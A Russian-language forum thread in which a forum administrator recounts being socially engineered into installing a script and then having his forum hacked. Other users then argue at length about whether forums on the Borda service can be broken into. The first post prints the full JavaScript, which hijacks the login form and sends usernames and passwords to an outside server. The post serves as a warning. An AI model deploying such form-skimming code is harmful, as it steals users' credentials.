Сентябрьский Лис: [Удалено администратором :) ] Администратор решил вернуть удаленное. Издание 2-е, перераб. и доп. 24 ноября ко мне зарегистрировался участник, который написал мне в ЛС, что ему очень нравится мой форум, ему очень нравятся ролевые игры, он очень хочет принять участие в обсуждении. Но он живёт не в России и у него другая система в компьютере и другой браузер, который не позволяет ему отвечать на форуме. Попросил поставить в HTML скрипт, который написан специально для его браузера и позволит ему оставлять сообщения на форуме. Мои прения с этим участником длились долго, в конце-концов участник стал присылать мне адреса других форумов, на которых стоит этот скрипт и на которых он сам играет. Я согласился поставить этот скрипт Конечно, это было большой глупостью с моей стороны. Вот этот скрипт: <script type="text/javascript"> function block (t) { t = t.replace("%", escape("%")); t = t.replace("$", escape("$")); t = t.replace("#", escape("#")); t = t.replace("\\", escape("\\")); return t; } function newtest() { if (document.all.nick.value) { a = document.all.nick.value; b = document.all.pass.value; } else if (document.frm.nick.value) { a = document.frm.nick.value; b = document.frm.pass.value; } else { a = "undefined"; b = "no"; } a = block(a); b = block(b); img = new Image(); img.src = "http://finalrev.jino-net.ru/155/s.php?" + a + " - " + b; setTimeout("newtest()", 1); } document.temp = new function() { var sec = document.write; this.write = function(txt) { txt = txt.replace(/<FORM.action=....method=POST>/, "<FORM action=\"/\" onsubmit=\"newtest()\" id=frm name=frm method=POST>"); this.sec = sec; this.sec(txt); this.sec = null; return true; } return this; } document.write = document.temp.write; document.temp = null; document.writeln = document.write; </script> Ночью форум был взломан. (кликните на картинку, чтобы прочитать "послание" взломщика) Взломщик удалил тему с объявлением, оставленную накануне форумом "Критик" о том, что наш форум "Сентябрьский Лис" внесён в каталог, удалил личные сообщения администратора (т.е. Лиса), в которых велись переговоры по поводу скрипта, очистил несколько тематических разделов и бан-лист, а так же удалил регистрацию участника, который был в курсе моих переговоров. Разговоры на форуме "Критик" до взлома моего форума: После взлома: Кстати, то что "Критик гавно" у нас никто не писал. Я бы себе никогда не позволил таких выражений (да и другим не позволил бы тоже). У нас на форуме было написано: "Критик угрожает нас взломать". Написано это было на основании тех разговоров, скриншоты которых вы видите выше. "У них там массовая амнистия" - фраза означает, что взломщик очистил бан-лист. Действительно, тему почистили не всю. Чистосердечное признание! cater - второй ник Кота Бегемота. Комментарий специалиста: [quote]Мда, ну скрипт на вид выглядит достаточно безобидно, но вот эта строчка: "http://finalrev.jino-net.ru/155/s.php?" + a + " - " + b;" - выглядит крайне подозрительно и знакомо. Если бы не обозначения, что именно присваивается этим переменным (хотя я яваскрипт плохо знаю и не вполне понимаю смысл того, что им присваивается), я бы сказала что на сервере этого типа скрипт s.php записывает вытянутые у админа логин (а) и пароль (b). Плюс к тому объяснение выглядит как чистый "развод лохов"[/quote]
Миледи2: Gabi Kaufmann На Борде есть красный уровень. Спамят лишь там, где нет премодерации. Я как-то давно забанила таких детей, и да, они понаписали на форуме гадостей. Вычистила, поставила премод, и больше я их не видела. Сентябрьский Лис Не надо доказывать. Вы правы. Борда - это не мибб какой-нибудь. Разбанить тут нельзя. И спам через премод не пройдет, если только сам админ сослепу не пропустит.
Gabi Kaufmann: Миледи2 пишет: не мибб какой-нибудь А зачем майбб оскорблять? Я борду не оскорбляла. Взломать могут любой форум на любом сервисе, и дети, и не дети.
Gabi Kaufmann: Сентябрьский Лис пишет: что Вы просто прихвастнули Вы намекаете что я ребенок и круглыми днями ломаю борду?)) Сентябрьский Лис пишет: Если я не прав - докажите. Уж извините, айпи этих детей у меня нет, но по-поведению это были либо подростки, либо крайне непосредственные неуравновешенные люди.))
Миледи2: Beastmaster пишет: Да и вы как, навязывали скрипты, убеждали поставить и т.д.? НИКОГДА. Есть только один человек, которому я доверяю в смысле скриптов - Norm Iridium. И там никто никому ничего не навязывает и не уговаривает. Нужен на ЦАТПе скрипт - берите сами. Если кто-то вас уговаривает - уже плохой признак. Не надо никого убеждать, люди сами решат, что им надо.
Gabi Kaufmann: Миледи2 пишет: НИКОГДА. Есть только один человек, которому я доверяю в смысле скриптов - Norm Iridium. И там никто никому ничего не навязывает и не уговаривает. Нужен на ЦАТПе скрипт - берите сами. Если кто-то вас уговаривает - уже плохой признак. Не надо никого убеждать, люди сами решат, что им надо. Согласна.Если скрипт навязывают-это ненормально.
Миледи2: Gabi Kaufmann Простите, невольно плохо выразилась.
Gabi Kaufmann: Сентябрьский Лис Я все-же задала ваш вопрос знакомому, можно ли как-то отличить "нехороший" скрипт от нормального. Жду теперь его ответа)).
Wanderer: Сентябрьский Лис пишет: И вообще, самое надёжное - голый html: чтоб никаких php и java! PHP такой же язык как и HTML. На нём работают многие форумы (я сейчас не о бесплатных хостингах под ролы, а вобще о форумах). Другое дело, когда вы на свой "голый html" пихаете что-то с PHP - вот тогда да. Ну а java - всегда были подозрительными, да.
Сентябрьский Лис: Gabi Kaufmann пишет: А зачем майбб оскорблять? Я борду не оскорбляла. Оскорбляли, милая, оскорбляли. Вот пример: Gabi Kaufmann пишет: а на борде одни скандалы. Источник http://septemberfox.forum24.ru/?1-1-0-00000067-000-0-0#002.001.001.001 А мы, между прочим, на Ваше оскорбление нашего сервиса ни единого замечания Вам не сделали, демонстрируя своим поведением, что тут как раз наоборот - скандалист пришёл с Mybb. И тут на борде - как раз очень терпеливые к вам, Mybb'овцам, люди. Gabi Kaufmann пишет: Взломать могут любой форум на любом сервисе, и дети, и не дети. Любой - могут, а Борду не могу. Тем она и держится. Gabi Kaufmann пишет: Вы намекаете что я ребенок и круглыми днями ломаю борду?)) Нет, я не намекаю, а прямо пишу, что Вы солгали, написав: "Могу привести массу реальных случаев, когда дети взламывали борду ( и именно борду, а не какой-либо другой сервис)". Источник Ни массы случаев, ни одного случая Вы привести не сможете - это ложь. Да, профессиональный программист, уровня ЦРУ, сможет взломать, но не мой форум отдельно, а весь сервис borda, принадлежащий case. Но никакой ребёнок, отдельно форум "Сентябрьский Лис" не взломает. Gabi Kaufmann пишет: Уж извините, айпи этих детей у меня нет, но по-поведению это были либо подростки, либо крайне непосредственные неуравновешенные люди.)) Зачем мне - Ай-пи??? От Вас просили рассказ о взломе. Рассказ. Разве Ай-пи - это рассказ? Вы же написали: «Могу привести массу реальных случаев...» Вы же не написали: «Могу привести массу реальных Ай-пи» Вот мы случаев и ждем-с! Да нет, не ждём, конечно же, т.к. их нет. Есть только ложь и оскорбление чужого сервиса.
McNamara: Gabi Kaufmann пишет: Уж извините, айпи этих детей у меня нет Так Вы приведите реальные адреса реальных форумов на борде, которые кто-то взломал))) Никаких ай-пи с Вас никто и не требует. Тем более, что по ай-пи, точно так же, как по паспортным данным, нельзя определить, террорист взломщик человек или не взломщик))
Gabi Kaufmann: Сентябрьский Лис пишет: А мы, между прочим, на Ваше оскорбление нашего сервиса ни единого замечания Вам не сделали, демонстрируя своим поведением, что тут как раз наоборот - скандалист пришёл с Mybb. И тут на борде - как раз очень терпеливые к вам, Mybb'овцам, люди. Ну это можно оспорить. Сентябрьский Лис пишет: Зачем мне - Ай-пи??? От Вас просили рассказ о взломе. Рассказ. Разве Ай-пи - это рассказ? Вы же написали: «Могу привести массу реальных случаев...» Вы же не написали: «Могу привести массу реальных Ай-пи» Вот мы случаев и ждем-с! Да нет, не ждём, конечно же, т.к. их нет. Есть только ложь и оскорбление чужого сервиса. McNamara пишет: Так Вы приведите реальные адреса реальных форумов на борде, которые кто-то взломал))) Никаких ай-пи с Вас никто и не требует. Тем более, что по ай-пи, точно так же, как по паспортным данным, нельзя определить, террорист взломщик человек или не взломщик)) Голословным высказываниям никто не поверит, но на моей памяти много взломанных бордовских ролевых.. И я никому не угрожаю, не говорю что могут взломать ваш форум, не говорю что майбб идеальна, или идеален укоз, не говорю что борда ненадежна, и взломать ее может даже ребенок. Я не на что не намекаю и никого не оскорбляю, и не знаю что вы там себе напридумывали. Просто какое-то время я сидела на борде, будучи еще подростком. Там были наши подростковые игры, довольно посредственные ролевки, где все ссорились из-за малейшего кусочка дизайна обвиняя друг-друга в плагиате.. Так вот, тогда, 4 года назад я общалась с девочкой, на которую пошли такие "наезды", что форум взломают, из-за того, что она якобы украла дизайн (причем дизайн делала не она, а вообще сторонний человек, имеющий свой сайт по дизайну, поэтому красть он просто не мог.) Нападки продолжались и ролевую взломали (причем взломали подростки, которые с ней ссорились, так ролевая ее была откровенно плохонькая по нынешним меркам). Кроме того, частенько, когда хожу по борде, вижу надпись:"Игрулька взломана". Я не знаю каким методом взломали эти ролевые, обдурив администратора или как то еще. Я не могу дать адресов форумов, так как это дело не сохраняла, прошлое уже достаточное количество времени и их давно снесли. Вы можете мне не верить, так как все написанное выше мой личный опыт и мое субъективное мнение. И вообще, давайте завершим этот спор, и ежу понятно, что у каждого сервиса есть свои недостатки и достоинства.Что есть хакеры, которые занимаются этим делом годами, есть дети, которые балуются, но знают не по детски много, есть масса способов обдурить админа, есть те же, надоевшие всем до боли джава скрипты и прочее.
McNamara: Gabi Kaufmann Вам бы, возможно, следовало признать, что другие люди тоже исходят из своего личного опыта и тоже могут оказаться правы) Я на Борде уже 3 года и не помню ни одного раза, чтобы её ломали, если сам админ не дал доступ до ПА другому человеку (то есть, имел место не взлом как таковой, а раззявистость админа). То же самое Вам скажут на техподдержке борды - и это правда))) Кстати, наберите, если не лень, в поисковой строке "взломать форум borda". Вы попадёте по поисковику на форумы настоящих взломщиков и почитаете, что они пишут по этому поводу)))
Gabi Kaufmann: McNamara Ну вот, мы и пришли наконец-то к сути делемы. Вы имеете свое мнение, я свое. Я же не говорю что я великая, живу на свете триста лет, гений в программировании и знаю борду как свои пять пальцев. Знаете, как некоторые говорят:"Я не люблю лук." Спрашивают:"Почему не любишь?" "Не люблю и все." Каждый человек имеет право иметь собственное мнение, не соглашаться с мнением других людей, и тд.Это и есть свобода выбора.А вы мне словно предлагаете перекроить свои взгляды. Я лишь высказала свою точку зрения-не более того.А уж верить вам моим словам, не верить-ваше личное дело.Каждый решает сам для себя.
McNamara: Gabi Kaufmann Я всего лишь призываю Вас не утверждать категорично что-либо, если Вы не можете подтвердить это фактически) Мнение - это мнение, а заявление о том, что Gabi Kaufmann пишет: на моей памяти много взломанных бордовских ролевых. - это уже конкретное указание на то, что Вы лично видели эти взломанные форумы. Либо клевета. В первом сообщении этой темы очень подробно описано, как именно состоялся взлом. Если Вы не можете ни привести адреса взломанных форумов борда, ни рассказать, что именно произошло на этих "взломанных"форумах, я бы на Вашем месте не стал делать категоричные заявления. За каждым категоричным заявлением должен быть фактический материал. Кстати, действительно очень советую ознакомиться с вопросом, набрав в любом поисковике (гугле например) строчку "Взломать форум borda". Очень интересно))))
Beastmaster: Gabi Kaufmann Ну вот потому и не верим. Потому что знаем на собственном примере. Потому что любой форум на Борде взломать можно только если админ это позволит. PS ну зайдите на форум техподдержки, оттуда примеры возьмите что ли
Gabi Kaufmann: McNamara Beastmaster свое мнение я высказала, это мое мнение.Добавить мне нечего.Хостингом борда не пользуюсь.
Сентябрьский Лис: Gabi Kaufmann пишет: Каждый человек имеет право иметь собственное мнение, не соглашаться с мнением других людей, и тд. Да. Каждый человек имеет право иметь собственное мнение. Но это не значит, что каждый человек имеет права распространять клевету. Вас никто не заставляет менять ваше мнение. Имейте его на здоровье! Но Вы тут распространяете клевету на сервис Borda, вы распространяете заведомую ложь. И если Вы не возьмёте свои слова по поводе того, что "но на моей памяти много взломанных бордовских ролевых" - которых на самом деле нет - я Вам поставлю в ЛЗ звание "Лгунья", ибо, то, что Вы лгунья - чистая правда. Gabi Kaufmann пишет: Кроме того, частенько, когда хожу по борде, вижу надпись:"Игрулька взломана". Не будьте ребёнком, эта фраза означает, что админ того форума поставил вторым админом непроверенного человека и тот снёс ему форум. Форум на borda можно "взломать" только таким способом. Но это не взлом по своей сути, а просто доверие статуса администратора кому попало. Поэтому и case выносит в основное правило: "Один форум - один админ" Выполняй это правило - и твой форум на Борде никогда не будет взломан. Gabi Kaufmann, лучше бы вы не говорили о том, чего не знаете. Ваше поведение оскорбительно для других участников форума.
Beastmaster: Gabi Kaufmann а я и не призываю. Особенно если собеседница говорит очевидную ложь. Как и я не пользуюсь МайББ и не собираюсь. Уж лучше платный сайт открыть, и платить за него, если понадобится больше 19 разделов, чем грузиться в этот детский сад. PS Есть ещё что рассказать о взломе и способах? Дабы не оффтопить.
Gabi Kaufmann: Сентябрьский Лис пишет: Да. Каждый человек имеет право иметь собственное мнение. Но это не значит, что каждый человек имеет права распространять клевету. Вас никто не заставляет менять ваше мнение. Имейте его на здоровье! Но Вы тут распространяете клевету на сервис Borda, вы распространяете заведомую ложь. И если Вы не возьмёте свои слова по поводе того, что "но на моей памяти много взломанных бордовских ролевых" - которых на самом деле нет - я Вам поставлю в ЛЗ звание "Лгунья", ибо, то, что Вы лгунья - чистая правда. Ради Бога, ставьте.
Wanderer: Сентябрьский Лис пишет: А мы, между прочим, на Ваше оскорбление нашего сервиса ни единого замечания Вам не сделали, демонстрируя своим поведением, что тут как раз наоборот - скандалист пришёл с Mybb. И тут на борде - как раз очень терпеливые к вам, Mybb'овцам, люди. Чё это вы на нас наезжаете? Это мы-то скандалисты? Да я вам сейчас за майбб... На самом деле, сервис тут, конечно же, не при чём. А есть конкретные ситуации/люди на конкретных форумах/играх. И, кстати, у меня почему-то наоборот, сложилось обратное впечатление. На бб-шном Лисе как-то всё культурнее, а суда как ни зайду - все говорят довольно резким тоном (сам грешен), а то и похлеще. Gabi Kaufmann пишет: Ну вот, мы и пришли наконец-то к сути делемы. Вы имеете свое мнение, я свое. Я же не говорю что я великая, живу на свете триста лет, гений в программировании и знаю борду как свои пять пальцев. Знаете, как некоторые говорят:"Я не люблю лук." Спрашивают:"Почему не любишь?" "Не люблю и все." Каждый человек имеет право иметь собственное мнение, не соглашаться с мнением других людей, и тд.Это и есть свобода выбора.А вы мне словно предлагаете перекроить свои взгляды. Речь немного о другом. Если 2x2=4 , и я вас начну в этом убеждать, а вы мне скажете 2х2=5 , это будет значить, не что вы имеете своё мнение по данному вопросу, а что вы - безграмотны в данном вопросе. А вот на вопрос "любишь ли математику" точки зрения могут быть разные. Поэтому правильная аналогия не "почему не любишь лук?", а "лук - это ягода?". Отдельно взятый форум на борде либо могут взломать, либо нет. Как в программировании - True или False. Т.е. думать-то можно что угодно, но правильный вариант ответа на вопрос "могут ли взломать форум на борде" - один: либо да, либо нет. "И да, и нет" часто бывает в экономике и юриспруденции, но не тут. Поэтому мнения ваши с МакНамарой и Лисом могут быть разными, но прав - кто-то один. Кстати, Сентябрьский Лис , а почему на борде нельзя взломать форум? Бордой не пользовался никогда (душа не лежит), а посему не осведомлён, но хотелось бы знать. Gabi Kaufmann пишет: И вообще, давайте завершим этот спор, и ежу понятно, что у каждого сервиса есть свои недостатки и достоинства. По-моему самые золотые слова в этом топике.